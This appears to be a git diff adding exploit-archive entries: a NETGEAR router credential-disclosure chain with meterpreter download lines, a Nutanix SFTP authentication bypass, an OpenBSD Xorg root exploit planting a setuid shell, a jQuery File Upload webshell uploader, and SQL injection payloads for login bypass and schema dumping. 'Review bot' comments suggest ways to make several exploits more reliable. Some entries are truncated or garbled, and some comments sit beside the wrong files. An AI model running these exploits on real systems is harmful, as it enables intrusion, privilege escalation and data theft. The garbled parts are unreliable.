diff --git a/exploits/hardware/dos/45746.php b/exploits/hardware/dos/45746.php
new file mode 100644
index 000000000..f5d1d1b01
--- /dev/null
+++ b/exploits/hardware/dos/45746.php
@@ -0,0 +1,35 @@
+# Exploit Title: ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
+# Date: 2018-10-28
+# Exploit Author: numan türle @numanturle
+# Vendor Homepage: https://www.zyxel.com/
+# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
+# Firmware: 1.00(AAPP.0)D7
+# Tested on: windows
+# Fixed firmware: 1.00(AAPP.7)
+
+
+"; }else {
+ continue;
+ }
+ }
+}else {
+ echo "pfff";
+}
+ftp_close($ftp_conn);
+?>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45741.txt b/exploits/hardware/webapps/45741.txt
new file mode 100644
index 000000000..fe84e6fb9
--- /dev/null
+++ b/exploits/hardware/webapps/45741.txt
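Review bot: `ftp_close($ftp_conn);` sits after the `if`/`else`, so it also runs on the `else` branch that prints `pfff`; if that branch is taken because the FTP connection (or login) did not succeed and `$ftp_conn` is `false`, `ftp_close()` emits a warning on PHP 7 and throws a `TypeError` on PHP 8. Move the close into the success branch or guard it: `if ($ftp_conn) { ftp_close($ftp_conn); }`. The condition the `else` pairs with is not visible here — everything between the header and the closing `";` is missing from this copy — so which failure `pfff` reports cannot be confirmed, but the message should name it (e.g. `echo "FTP connect/login failed";`), since a PoC that prints `pfff` gives the tester nothing to act on.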
@@ -0,0 +1,34 @@
+# Exploit Title: NETGEAR WiFi Router R6120 - Credential Disclosure
+# Date: 2018-10-28
+# Exploit Author: Wadeek
+# Hardware Version: R6120
+# Firmware Version: 1.0.0.30
+# Vendor Homepage: https://www.netgear.com/support/product/R6120.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6120/R6120-V1.0.0.30.zip
+
+# == Files Containing Juicy Info ==
+>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
+SSSSSSSNNNNNN
+
+# == Security Questions Bypass > Password Disclosure ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=passwordrecovered.htm&SID=
+
+">You have successfully recovered the admin password.
+">Router Admin Username: admin
+">Router Admin Password: Str0ng+-Passw0rd
+
+# == Authenticated Telnet Command Execution ==
+>> http://admin:Str0ng+-Passw0rd@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+R6120 login: admin
+Password: Str0ng+-Passw0rd
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}
\ No newline at end of file
diff --git a/exploits/jsp/webapps/45755.txt b/exploits/jsp/webapps/45755.txt
new file mode 100644
index 000000000..5c07308ef
--- /dev/null
+++ b/exploits/jsp/webapps/45755.txt
@@ -0,0 +1,93 @@
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/linux/dos/45750.txt b/exploits/linux/dos/45750.txt
new file mode 100644
index 000000000..6edcc882a
--- /dev/null
+++ b/exploits/linux/dos/45750.txt
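Review bot: The link between the first and second sections is left implicit: `rootDesc.xml` on port 56688 is listed under "Files Containing Juicy Info" and the same `SSSSSSSNNNNNN` placeholder reappears as `dev_serial=` in the recovery request, but nothing states that the serial number the recovery form asks for is read from that unauthenticated UPnP description. A one-line comment after the rootDesc line, `# serialNumber from rootDesc.xml = the dev_serial value used in htpwd_recovery.cgi below`, would make the chain explicit. The "one attempt because /tmp/SessionFile.*.htm" remark should also say what the tester does after a failed attempt (presumably wait for or clear that session file — verify), since the write-up gives no recovery step.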
@@ -0,0 +1,23 @@
+# Exploit Title: SIPp 3.3.990 - Local Buffer Overflow (PoC)
+# Date: 2018-10-29
+# Exploit Author: Nawaf Alkeraithe
+# Vendor Homepage: http://sipp.sourceforge.net/
+# Software Link:
+https://sourceforge.net/projects/sipp/files/sipp/3.4/sipp-3.3.990.tar.gz/download
+
+# Version: SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 29 2018
+# Tested on: 3.3.990
+
+$ ./sipp -trace_logs $(python -c 'print "A"*300')
+
+
+
+$ ./sipp -message_file $(python -c 'print "A"*300')
+
+
+
+$ ./sipp -calldebug_file $(python -c 'print "A"*300')
+
+
+
+$ ./sipp -trace_err $(python -c 'print "A"*300')
\ No newline at end of file
diff --git a/exploits/multiple/remote/45748.py b/exploits/multiple/remote/45748.py
new file mode 100755
index 000000000..28074f1ac
--- /dev/null
+++ b/exploits/multiple/remote/45748.py
@@ -0,0 +1,31 @@
+# Exploit Title: Nutanix AOS & Prism - SFTP Authentication Bypass
+# Date: 2018-10-27
+# Exploit Author: Adam Brown
+# Vendor Homepage: https://www.nutanix.org
+# Software Link: https://www.nutanix.com/products/software-options/
+# Version: < 5.5.5 (LTS), < 5.8.1 (STS)
+# Tested on: Acropolis Operating System
+# CVE : Related to CVE-2018-7750
+#
+# This PoC is based on discussions found at the following blog post:
+# https://coffeegist.com/security/paramiko-ssh-authentication-bypass-in-nutanix/
+# TLDR, the Acropolis SFTP server doesn't check if the client has completed the
+# authentication step before allowing the client to open channels. The PoC below
+# connects to the acropolis SFTP server, and lists the root directory without
+# authenticating.
+
+#!/usr/bin/python
+import paramiko
+
+host = '127.0.0.1'
+port = 2222
+
+trans = paramiko.Transport((host, port))
+trans.start_client()
+
+# If the call below is skipped, no username or password is required.
+# trans.auth_password('username', 'password')
+
+sftp = paramiko.SFTPClient.from_transport(trans)
+print(sftp.listdir('/'))
+sftp.close()
\ No newline at end of file
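Review bot: All four commands rely on `python -c 'print "A"*300'`, which is Python 2 syntax; where `python` resolves to Python 3 it fails with a SyntaxError, `$(...)` expands to nothing and sipp is started with an empty argument, so the PoC silently does not test anything. Use `python2` explicitly, or a shell-only form such as `$(printf 'A%.0s' $(seq 300))`. The write-up also shows no crash output for any of the four options; the blank lines after each command look like where it stood originally, so if the evidence exists (a `Segmentation fault` line or an ASan report) it should be restored, otherwise "Buffer Overflow (PoC)" rests on nothing visible.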
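Review bot: `#!/usr/bin/python` is on line 17, after the comment header, so it is not a shebang and the `100755` mode on the new file buys nothing; move it to line 1 or drop it. The Transport is never closed: `sftp.close()` closes the SFTP channel but `trans` keeps the SSH session open until interpreter exit, so add `trans.close()` after it. `host`/`port` are hard-coded to `127.0.0.1:2222`, which reads like a local forward rather than a target; taking them from `sys.argv` with a one-line usage message would make the PoC runnable against a real appliance without editing the file.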
diff --git a/exploits/openbsd/local/45742.sh b/exploits/openbsd/local/45742.sh
new file mode 100755
index 000000000..386beaa89
--- /dev/null
+++ b/exploits/openbsd/local/45742.sh
@@ -0,0 +1,76 @@
+# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation
+# Date: 2018-10-27
+# Exploit Author: Marco Ivaldi
+# Vendor Homepage: https://www.x.org/
+# Version: xorg-x11-server 1.19.0 - 1.20.2
+# Tested on: OpenBSD 6.3 and 6.4
+# CVE : CVE-2018-14665
+
+# raptor_xorgasm
+
+#!/bin/sh
+
+#
+# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
+# Copyright (c) 2018 Marco Ivaldi
+#
+# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
+# check for -modulepath and -logfile options when starting Xorg. X server
+# allows unprivileged users with the ability to log in to the system via
+# physical console to escalate their privileges and run arbitrary code under
+# root privileges (CVE-2018-14665).
+#
+# This exploit targets OpenBSD's cron in order to escalate privileges to
+# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical
+# console, it works perfectly on pseudo-terminals connected via SSH as well.
+#
+# See also:
+# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
+# https://www.exploit-db.com/exploits/45697/
+# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
+#
+# Usage:
+# blobfish$ chmod +x raptor_xorgasm
+# blobfish$ ./raptor_xorgasm
+# [...]
+# Be patient for a couple of minutes...
+# [...]
+# Don't forget to cleanup and run crontab -e to reload the crontab.
+# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab
+# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned
+# blobfish# id
+# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
+#
+# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
+# OpenBSD 6.4 (Xorg 1.19.6) [tested]
+# OpenBSD 6.3 (Xorg 1.19.6) [tested]
+#
+
+echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron"
+echo "Copyright (c) 2018 Marco Ivaldi "
+
+# prepare the payload
+cat << EOF > /tmp/xorgasm
+cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available
+echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
+gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid
+chmod 4777 /usr/local/bin/pwned
+EOF
+chmod +x /tmp/xorgasm
+
+# trigger the bug
+cd /etc
+Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
+sleep 5
+pkill Xorg
+
+# run the setuid shell
+echo
+echo "Be patient for a couple of minutes..."
+echo
+sleep 120
+echo
+echo "Don't forget to cleanup and run crontab -e to reload the crontab."
+ls -l /etc/crontab*
+ls -l /usr/local/bin/pwned
+/usr/local/bin/pwned
\ No newline at end of file
diff --git a/exploits/php/webapps/45584.txt b/exploits/php/webapps/45584.txt
index 9c3bb6d0f..3d282b4fe 100644
--- a/exploits/php/webapps/45584.txt
+++ b/exploits/php/webapps/45584.txt
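Review bot: `sleep 120` is a blind wait: cron fires the injected `* * * * *` job at the next minute boundary, so the fixed delay is either longer than needed or, on a slow host where `gcc` takes a while, too short, and `/usr/local/bin/pwned` is executed before the payload has finished replacing it. Polling for the setuid bit the payload sets with `chmod 4777` is more reliable (below). `#!/bin/sh` is on line 11, after the header comments, so it is not honoured when the script is run as `./raptor_xorgasm` as the usage shows; it has to be line 1. The payload also leaves a mode-4777 root-owned binary in `/usr/local/bin` and overwrites `/etc/crontab` with the Xorg log; "Don't forget to cleanup" should spell out `rm /usr/local/bin/pwned /tmp/xorgasm /tmp/pwned.c` and restoring `/etc/crontab` (the `ls -l /etc/crontab*` glob suggests a backup copy may sit next to it — verify on the target).
```sh
# … unchanged: payload, trigger …
# wait for cron to run the injected job instead of a fixed 120s
n=0
while [ $n -lt 180 ] && [ ! -u /usr/local/bin/pwned ]; do
    sleep 1
    n=$((n + 1))
done
# … unchanged: cleanup reminder, ls, /usr/local/bin/pwned …
```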
@@ -14,4 +14,285 @@ # Exploit Code:
-$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
\ No newline at end of file
+$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
+
+
+#!/bin/bash
+
+
+
+USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
+
+PATHS=("server/php/upload.class.php" "example/upload.php" "server/php/UploadHandler.php" "php/index.php")
+
+MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php"
+
+
+
+# What is added in this exploit from the original version
+
+# - a bit of refactoring
+
+# - automatically request the right filename if it already exists on server ex: 'file (1).php'
+
+# - Try to detect plugin version,
+
+# - Try to detect index.html (allowing files upload via gui)
+
+
+
+# Checking curl & jq
+
+
+
+curl -h &>/dev/null
+
+if [ $? -ne 0 ]; then
+
+ echo "[!] Please install curl."
+
+ echo "# apt install curl"
+
+ exit 1
+
+fi
+
+
+
+jq -h &>/dev/null
+
+if [ $? -ne 0 ]; then
+
+ echo "[!] Please install jq."
+
+ echo "# apt install jq"
+
+ exit 1
+
+fi
+
+
+
+# Checking url
+
+
+
+if [ -z $1 ]; then
+
+ echo "[!] Please supply a target host as an argument."
+
+ echo "$0 http://www.example.com"
+
+ exit 1
+
+fi
+
+
+
+# Generating payload
+
+
+
+echo "" > ${MALICIOUS_FILE}
+
+echo "________________________________________________________________________________"
+
+echo "|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206"
+
+echo "|Checks for older versions of the code and upload an harmless file."
+
+echo "|"
+
+echo "| @_larry0, @phackt_ul"
+
+echo "|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None)."
+
+echo "---/"
+
+echo
+
+echo "[+] Checking variations :"
+
+
+
+# Creating alias
+
+
+
+curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"'
+
+
+
+index=-1
+
+found=0
+
+
+
+# Looking for upload php class file
+
+
+
+for x in ${PATHS[@]}; do
+
+ echo "[*] Testing... -> $1/$x"
+
+ ${curl} -i "$1/$x" | head -1 | grep 200 &>/dev/null
+
+
+
+ if [ $? -eq 0 ]; then
+
+ echo "[+] Found Path: $x"
+
+ index=$((${index}+1))
+
+ found=1
+
+ break;
+
+ fi;
+
+
+
+ index=$((${index}+1))
+
+
+
+done
+
+
+
+# Determining the exploit path according to the jquery version
+
+
+
+exploit_path=""
+
+
+
+if [ ${index} -eq 0 -o ${index} -eq 2 ];then
+
+ exploit_path="server/php/index.php"
+
+fi
+
+
+
+if [ ${index} -eq 1 ];then
+
+ exploit_path="example/upload.php"
+
+fi
+
+
+
+if [ ${index} -eq 3 ];then
+
+ exploit_path="php/index.php"
+
+fi
+
+
+
+if [ ${found} -ne 1 ]; then
+
+ echo "[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!"
+
+ exit 1
+
+fi
+
+
+
+# Trying to detect bower.json, package.json
+
+
+
+version_files=("bower.json package.json")
+
+
+
+for x in ${version_files[@]}; do
+
+ version=`${curl} "$1/$x" | jq -r .version`
+
+ if [ "X" != "X""${version}" ]; then
+
+ echo "[!] Found: Plugin version ${version}"
+
+ break;
+
+ fi
+
+done
+
+
+
+# Trying to detect index.html
+
+
+
+${curl} "$1/index.html" | grep -i "jquery file upload" &>/dev/null
+
+
+
+if [ $? -eq 0 ]; then
+
+ echo "[!] Found: $1/index.html is accessible"
+
+fi
+
+
+
+# Uploading payload
+
+
+
+res=""
+
+echo "[+] Running ${curl} -F \"files[]=@${MALICIOUS_FILE}\" -F \"filename=${MALICIOUS_FILE}\" \"$1/${exploit_path}\""
+
+
+
+filename=`${curl} -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" "$1/${exploit_path}" | jq -r .files[].name`
+
+
+
+if [ "X""$(unknown)" == "X" ]; then
+
+ echo "[!] It seems that we had a false positive!
:("
+
+ exit 1
+
+fi
+
+
+
+filename=`echo "$filename" | sed 's/ /%20/g'`
+
+
+
+# Trying to see if victim has been exploited
+
+
+
+echo "[+] Testing path: $1/$(dirname ${exploit_path})/files/$(unknown)"
+
+res=`${curl} "$1/$(dirname ${exploit_path})/files/$(unknown)"`
+
+
+
+if [ "${res}" == "it works" ]; then
+
+ echo "[!] Found: $1 is vulnerable"
+
+else
+
+ echo "[+] Seems not vulnerable :("
+
+fi
+
+
+
+rm -f "${MALICIOUS_FILE}" &>/dev/null
\ No newline at end of file
diff --git a/exploits/php/webapps/45736.txt b/exploits/php/webapps/45736.txt
new file mode 100644
index 000000000..2874b08e2
--- /dev/null
+++ b/exploits/php/webapps/45736.txt
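Review bot: The `curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"'` alias does not do what it intends: the single quotes keep `${USERAGENT}` unexpanded, and when `${curl}` is later expanded unquoted the word `"${USERAGENT}"` is passed to curl literally, double quotes included, so every request goes out with that string as its User-Agent rather than the Firefox one defined at the top. Use an array instead: `curl=(curl --connect-timeout 10 -sk -A "${USERAGENT}")` and invoke it as `"${curl[@]}"`. `if [ -z $1 ]` needs `"$1"` quoted, and `version_files=("bower.json package.json")` is a one-element array that only works because the loop expands it unquoted — write it as two elements. The `$(unknown)` tokens in the false-positive check and in the `files/` path look like an extraction artifact for `${filename}`; as written they run a non-existent command, so the check always reports a false positive and exits before the vulnerability test.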
@@ -0,0 +1,61 @@
+# Exploit Title: South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/janobe
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/southgateinn_0.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
+#
+POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 104
+USERID=1&UNAME=Anonymous&USERNAME=efe&deptid=&UPASS=efe&ROLE=Administrator&deptid=&PHONE=912856478&save=
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 14:20:22 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 57
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
+#
+GET
/[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION%20SELECT%201,2,3,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),5,6,7,8,9,10,11--%20- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 14:23:59 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45737.txt b/exploits/php/webapps/45737.txt
new file mode 100644
index 000000000..a3c979a52
--- /dev/null
+++ b/exploits/php/webapps/45737.txt
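Review bot: POC 1 carries no SQL payload — it is a plain POST to `admin/mod_users/controller.php?action=edit` that sets `ROLE=Administrator` and `UPASS=efe` for `USERID=1`, and the write-up never says what it demonstrates (the title only covers the `q` injection shown in POC 2). If the point is that the edit handler accepts the request without an authenticated admin session, say so in one line, e.g. `# 1) unauthenticated user edit: the request below resets user 1's password and role with no admin login (verify)`; otherwise it reads as an unrelated request pasted in. POC 2 would also benefit from a one-line description — the encoded `q` value is a UNION-based query over `information_schema.columns` that lists every table and column of the current database — since the percent-encoded form is not readable as is.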
@@ -0,0 +1,77 @@
+# Exploit Title: Electricks eCommerce 1.0 - 'prodid' SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/billyblue
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/index_search.php
+#
+#[PATH]/index_search.php
+#....
+#139 if (isset($_POST['search'])){
+#140
+#141 $search=$_POST['search'];
+#142
+#143 $query="SELECT * FROM products WHERE category LIKE '%$search%' OR prod_name LIKE '%$search%' OR prod_desc LIKE '%$search%'";
+#144 $result = mysqli_query($dbconn,$query);
+#145 while($res=mysqli_fetch_array($result)){
+#146 $prod_id=$res['prod_id'];
+#....
+POST /[PATH]/index_search.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 265
+search=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 14:51:00 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/pages/product_details.php?prod_id=[SQL]
+#
+#[PATH]/pages/product_details.php
+#....
+#49 include('../config/dbconn.php');
+#50 $prod_id=$_GET['prod_id'];
+#51 $query = "SELECT * FROM products WHERE prod_id='$prod_id'";
+#52 $result = mysqli_query($dbconn,$query);
+#53 while($res = mysqli_fetch_array($result)) {
+#....
+GET /[PATH]/pages/product_details.php?prod_id=%2d%31%32%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%29%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 14:55:09 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 7673
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45739.txt b/exploits/php/webapps/45739.txt
new file mode 100644
index 000000000..668f3388c
--- /dev/null
+++ b/exploits/php/webapps/45739.txt
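Review bot: The POC 2 request is given only as a fully percent-encoded `prod_id`, which hides what it does; since the quoted line 51 builds `... WHERE prod_id='$prod_id'` from the raw `$_GET` value, the decoded payload should be shown next to it: `-12' UNION(SELECT(1),(SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12))-- -`. The same applies to POC 1, whose `search` value is a duplicate-key error-based extraction of `user()`, `database()` and `version()` through `INFORMATION_SCHEMA.PLUGINS`; one sentence saying so saves the reader decoding it. Neither POC states a remediation; `mysqli_prepare` with a bound parameter on lines 143 and 51 is the fix and is worth a line.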
@@ -0,0 +1,46 @@
+# Exploit Title: phptpoint Pharmacy Management System 1.0 - 'username' SQL injection
+# Date: 2018-10-24
+# Exploit Author: Boumediene KADDOUR
+# Unit: Algerie Telecom R&D Unit
+# Vendor Homepage: https://www.phptpoint.com/
+# Software Link: https://www.phptpoint.com/pharmacy-management-system/
+# Version: 1
+# Tested on: WAMP windows 10 x64
+# CVE: unknown
+
+# Description:
+# phptpoint Pharmacy Management System SQL injection suffers from a SQL
+# injection vulnerability that allows an attacker to bypass the login page
+# and authenticate as admin or any other user.
+
+# Vulnerable Code:
+
+# 4 $username=$_POST['username'];
+# 5 $password=$_POST['password'];
+# 6 $position=$_POST['position'];
+# 7 switch($position){
+# 8 case 'Admin':
+# 9 $result=mysql_query("SELECT admin_id, username FROM admin WHERE
+# username='$username' AND password='$password'");
+# 10 $row=mysql_fetch_array($result);
+
+# Payload:
+
+POST /Pharmacy/index.php HTTP/1.1
+Host: 172.16.122.4
+Content-Length: 80
+Cache-Control: max-age=0
+Origin: http://172.16.122.4
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://172.16.122.4/Pharmacy/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
+Cookie: PHPSESSID=2kn5jlcarggk5u3bl1crarrj85
+Connection: close
+
+username=admin%27+OR+1+--+&password=anyPassword&position=Admin&submit=Login
\ No newline at end of file
diff --git a/exploits/php/webapps/45740.txt b/exploits/php/webapps/45740.txt
new file mode 100644
index 000000000..466c48788
--- /dev/null
+++ b/exploits/php/webapps/45740.txt
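Review bot: The write-up names no remediation, and the quoted code makes one obvious: the query on line 9 is built with the `mysql_*` API (removed in PHP 7) and compares a plaintext `password` column, so the fix is a `mysqli`/PDO prepared statement with a bound `username` plus `password_verify()` against a stored hash instead of `password='$password'`. The payload `admin' OR 1 -- ` turns the WHERE clause into `username='admin' OR 1 -- ...`, which matches every row, so `mysql_fetch_array` returns the first row of `admin`, not necessarily the account named `admin`; that is worth a sentence given the description promises "admin or any other user". The description's "SQL injection suffers from a SQL injection vulnerability" repeats itself and should read "phptpoint Pharmacy Management System suffers from a SQL injection vulnerability".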
@@ -0,0 +1,120 @@
+# Exploit Title: Webiness Inventory 2.9 - Arbitrary File Upload
+# Date: 2018-10-27
+# Exploit Author: Boumediene KADDOUR
+# Unit: Algerie Telecom R&D Unit
+# Software Link: https://github.com/webiness/webiness_inventory
+# Version: 2.9<
+# Tested on: WAMP windows 10 x64
+# CVE: unknown
+
+# Vulnerable Code: https://github.com/webiness/webiness_inventory/blob/master/protected/library/ajax/WsSaveToModel.php
+
+46 foreach ($_FILES as $file) {
+47 $fileName = $file['name'];
+48 $fileTmp = $file['tmp_name'];
+49 $destDir = WsROOT.'/runtime/'.$model;
+50
+51 $field = key($_FILES);
+52
+53 // files are upload to "runtime" directory create destination directory
+54 // if not exist
+55 if (!file_exists($destDir)) {
+56 mkdir($destDir, 0777, true);
+57 }
+58
+59 // allowed file size is 3MB
+60 if ($file['size'] > 3145728) {
+61 continue;
+62 }
+63
+64 // remove old file with same name
+65 if (file_exists($destDir.'/'.$fileName)) {
+66 unlink($destDir.'/'.$fileName);
+67 }
+68
+69 // upload file
+70 move_uploaded_file($fileTmp, $destDir.'/'.$fileName);
+71 $m->$field= $fileName;
+72 }
+
+# Proof Of Concept
+
+POST /webiness_inventory-2.3/protected/library/ajax/WsSaveToModel.php HTTP/1.1
+Host: 172.16.122.4
+Content-Length: 1838
+Accept: */*
+Origin: http://172.16.122.4
+X-Requested-With: XMLHttpRequest
